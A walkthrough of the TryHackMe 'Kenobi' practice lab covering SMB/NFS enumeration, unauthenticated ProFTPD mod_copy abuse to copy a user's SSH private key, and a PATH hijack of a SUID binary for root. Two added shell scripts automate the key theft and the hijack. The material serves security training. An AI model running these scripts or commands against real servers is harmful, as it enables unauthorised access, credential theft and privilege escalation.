This is the write-up for the room Kenobi on TryHackMe; it is part of the Complete Beginner path.
Connect through the VPN or use the AttackBox on the TryHackMe site to reach the lab environment.
Task Kenobi
Task 1
Read everything in the task and start up the machine attached to it.
1.1 Make sure you’re connected to our network and deploy the machine
Press complete
1.2 Scan the machine with nmap, how many ports are open?
Open up a terminal and type in
nmap -T4 -p- <MACHINE_IP>
The -p- flag scans all 65535 TCP ports. You can also run the command below, but without -p it only scans the 1000 most common ports; in return -sV identifies the service versions and -sC runs the default scripts, which we need later.
nmap -sV -sC <MACHINE_IP>
Answer: 7
Task 2:
Read everything in the task.
2.1 Using the nmap command above, how many shares have been found?
Type in the command given in the task (port 445 is SMB; the two scripts enumerate shares and users):
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <MACHINE_IP>
Answer: 3
2.2 Once you're connected, list the files on the share. What file can you see?
Type in the following command
smbclient //<MACHINE_IP>/anonymous
Press Enter when asked for a password: the share allows anonymous (null-session) access.
Now we are connected to the share. For a list of files type in
ls
Answer: log.txt
To read the file from inside smbclient type in
more log.txt
(or use get log.txt to download a copy to your own machine).
2.3 What port is FTP running on?
We can see in the nmap scan which port FTP is running on.
Answer: 21
2.4 What mount can we see?
Type in the following command (port 111 is rpcbind, which is what the NFS scripts query)
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <MACHINE_IP>
Answer: /var
Task 3
3.1 What is the version?
There are two ways to find this. For the first method type in the following command
nmap -sV -sC <MACHINE_IP>
For the second method, connect to the FTP port directly; ProFTPD prints its version in the banner.
nc <MACHINE_IP> 21
Answer: 1.3.5
3.2 How many exploits are there for the ProFTPd running?
Type in the following command
searchsploit proftpd 1.3.5
Answer: 3
3.3 We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.
First we use netcat to connect to the FTP service
nc <MACHINE_IP> 21
We are not logged in, so normal FTP commands are refused, but we know from the log file on the SMB share that the FTP service runs as kenobi. The mod_copy module in ProFTPD 1.3.5 (CVE-2015-3306) accepts the SITE CPFR and SITE CPTO commands without authentication, so we can copy any file the service can read, including kenobi's private key, to a location we can reach.
Type in the following two commands, one after the other (the server answers the first with a 350 reply and the second with 250 Copy successful):
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
Press complete
3.4 We knew that the /var directory was a mount we could see (task 2, question 4). So we've now copied Kenobi's private key to the /var/tmp directory (the original stays where it was).
Press complete
3.5 What is Kenobi’s user flag (/home/kenobi/user.txt)?
Let's mount the exported /var directory on our machine (mounting needs root, so prefix the commands with sudo if you are not root). Type in the following commands
mkdir /mnt/kenobiNFS
mount <MACHINE_IP>:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
We now have the deployed machine's /var mounted on our own machine. We can go into tmp, grab the private key and log in to Kenobi's account.
Type in the following command
cp /mnt/kenobiNFS/tmp/id_rsa .
Now that we have copied the key we can log in with it.
Type in the following
ssh -i id_rsa kenobi@<MACHINE_IP>
Oops, we forgot to set the correct permissions. ssh refuses to use a private key that other users can read (it prints WARNING: UNPROTECTED PRIVATE KEY FILE!), ignores the key and falls back to asking for a password.
Back out and type in the following command (sudo is not needed, we own the file)
chmod 600 id_rsa
And now we can login
Type in
ls -la
notice the user.txt. Type in
cat user.txt
Use this output for the answer to the question.
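Putting 3.3 to 3.5 together, here is an added example (it is not part of the original write-up or of the room) that drives mod_copy from a script instead of typing into nc, checks the server's replies before going on, and then pulls the key back over the NFS export. It assumes the target IP is passed as the first argument, that the export and paths are as in the room, that nc is the OpenBSD or GNU netcat, and that mount can be run with sudo on the attacking machine. The 350 and 250 reply codes are what mod_copy returns after a successful CPFR and CPTO; the transcripts used to check the parser are constructed.

```shell
#!/bin/sh
# Added example, not from the original write-up. Copies kenobi's SSH key via
# ProFTPD mod_copy (SITE CPFR/CPTO need no login), verifies the replies,
# then fetches the copy over the NFS export of /var.
# Assumptions: target IP in $1; /var exported over NFS; OpenBSD/GNU nc.
set -eu

SRC_KEY=/home/kenobi/.ssh/id_rsa   # readable by the FTP service (runs as kenobi)
DST_KEY=/var/tmp/id_rsa            # inside the NFS export, writable by kenobi
NFS_MNT=/mnt/kenobiNFS

# Print the FTP command sequence for a mod_copy copy. CPFR selects the
# source, CPTO the destination; QUIT makes the server close the session
# so nc returns instead of hanging.
ftp_copy_commands() {
    printf 'SITE CPFR %s\r\nSITE CPTO %s\r\nQUIT\r\n' "$1" "$2"
}

# Return 0 if a server transcript shows both mod_copy success replies:
# "350 File or directory exists, ready for destination name" after CPFR
# and "250 Copy successful" after CPTO. Anything else (e.g. 550) means the
# copy did not happen and mounting the export would be pointless.
copy_succeeded() {
    printf '%s\n' "$1" | grep -q '^350 ' &&
    printf '%s\n' "$1" | grep -q '^250 '
}

# Talk to the FTP port and capture what the server says.
run_mod_copy() {
    ftp_copy_commands "$SRC_KEY" "$DST_KEY" | nc -w 5 "$1" 21
}

# Mount the export, copy the key out, and fix its mode: ssh ignores a key
# that is readable by group/others and falls back to password auth.
fetch_key_over_nfs() {
    sudo mkdir -p "$NFS_MNT"
    sudo mount -t nfs "$1:/var" "$NFS_MNT"
    cp "$NFS_MNT/tmp/id_rsa" ./id_rsa
    chmod 600 ./id_rsa
    sudo umount "$NFS_MNT"
}

main() {
    target=$1
    transcript=$(run_mod_copy "$target")
    if ! copy_succeeded "$transcript"; then
        printf 'mod_copy copy failed, server said:\n%s\n' "$transcript" >&2
        exit 1
    fi
    fetch_key_over_nfs "$target"
    ssh -i ./id_rsa "kenobi@$target" 'cat /home/kenobi/user.txt'
}

# Usage: sh kenobi_key.sh <MACHINE_IP>
if [ "$#" -gt 0 ]; then main "$@"; fi
```

The reply check matters in practice: mod_copy only copies what the ProFTPD process itself can read and only to where it can write, so if the service had been running as a less privileged user the CPFR would fail with a 550 and the script stops there instead of mounting an export that holds nothing.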
Task 4
4.1 What file looks particularly out of the ordinary?
Read everything in this task. The SUID bit is hard to understand at first, but we have already written a lot of write-ups about it: a file with the SUID bit set runs with the privileges of its owner (here root) instead of those of the user who started it, so anything it runs inherits root.
Type in the following command to list every SUID file (-perm -u=s is the same as -perm -4000)
find / -perm -u=s -type f 2>/dev/null
Answer: /usr/bin/menu
4.2 Run the binary, how many options appear?
Answer: 3
4.3 We are going to use this to get root access
Type in the following commands, one per line
cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu
The menu binary runs curl by its bare name, so the shell it spawns looks curl up in PATH. We created a file called curl in /tmp whose only content is the path /bin/sh, made it executable and put /tmp at the front of our PATH. When /usr/bin/menu runs the curl option it finds our file first; the file has no shebang, so the shell executes it as a script, and that script starts /bin/sh. Because menu is SUID root, the shell it starts runs as root. (chmod 755 would have been enough; world-writable is not needed.)
Now cat out root.txt.
Use the output for the answer.
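As an added example (not the room's code and not from the original write-up), the following script makes the PATH hijack explicit and checkable: it lists SUID-root binaries, uses strings to show which commands a binary runs by bare name (a heuristic that also surfaces imported symbol names such as system, which is itself a useful hint), plants a fake of that name in a scratch directory, and shows where command -v now resolves it before running the SUID binary with that directory first in PATH. /usr/bin/menu and the command name curl are taken from the room; the scratch directory is created with mktemp. One caveat: if /bin/sh on the target is bash, bash drops the effective uid unless started with -p, so the fake should then exec /bin/bash -p; on Ubuntu /bin/sh is dash, which keeps it.

```shell
#!/bin/sh
# Added example, not from the original write-up: make the PATH hijack
# against the SUID menu binary explicit and checkable.
# Assumptions: /usr/bin/menu and the command name "curl" are from the room;
# the fake is planted in a mktemp directory rather than /tmp directly.
set -eu

# SUID binaries owned by root: these run with root's effective uid no
# matter who starts them, so any command they run by bare name is a target.
find_suid_root() {
    find / -perm -4000 -user root -type f 2>/dev/null
}

# Heuristic: printable strings that look like a command line starting with
# a bare (unqualified) program name, e.g. "curl -I localhost". A binary
# that called /usr/bin/curl by full path would not be hijackable this way.
# Plain lowercase words such as "system" (imported symbols) also match.
bare_commands() {
    strings -n 4 -- "$1" | grep -E '^[a-z][a-z0-9_-]*( |$)' || true
}

# Plant a fake NAME in DIR that execs a shell, and print where a lookup of
# NAME resolves once DIR is first in PATH (expected: "$DIR/NAME").
# 755 is enough; the write-up's 777 is not needed.
plant_fake() {
    name=$1 dir=$2
    mkdir -p "$dir"
    printf '#!/bin/sh\nexec /bin/sh\n' > "$dir/$name"
    chmod 755 "$dir/$name"
    ( PATH="$dir:$PATH"; command -v "$name" )
}

main() {
    bin=${1:-/usr/bin/menu}
    echo "SUID root binaries:";          find_suid_root
    echo "Bare-name commands in $bin:";  bare_commands "$bin"
    dir=$(mktemp -d /tmp/hijack.XXXXXX)
    echo "fake curl resolves to: $(plant_fake curl "$dir")"
    # Run the SUID binary with our directory first in PATH. Picking the
    # option that runs curl execs our fake, which now runs as root.
    PATH="$dir:$PATH" "$bin"
}

# Usage: sh suid_path_hijack.sh /usr/bin/menu
if [ "$#" -gt 0 ]; then main "$@"; fi
```

The defensive reading of the same script: a SUID program that calls helpers by absolute path, or that resets PATH to a fixed value before calling system(), gives plant_fake nothing to hijack, which is why bare_commands is the first thing to look at on any SUID binary you find.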
BONUS
Now that we have a shell, notice that it is not a stable one. Let's make it stable with what we have learned so far. We learned some techniques for this in the room What the Shell?
Type in the following command to upgrade it to a proper TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'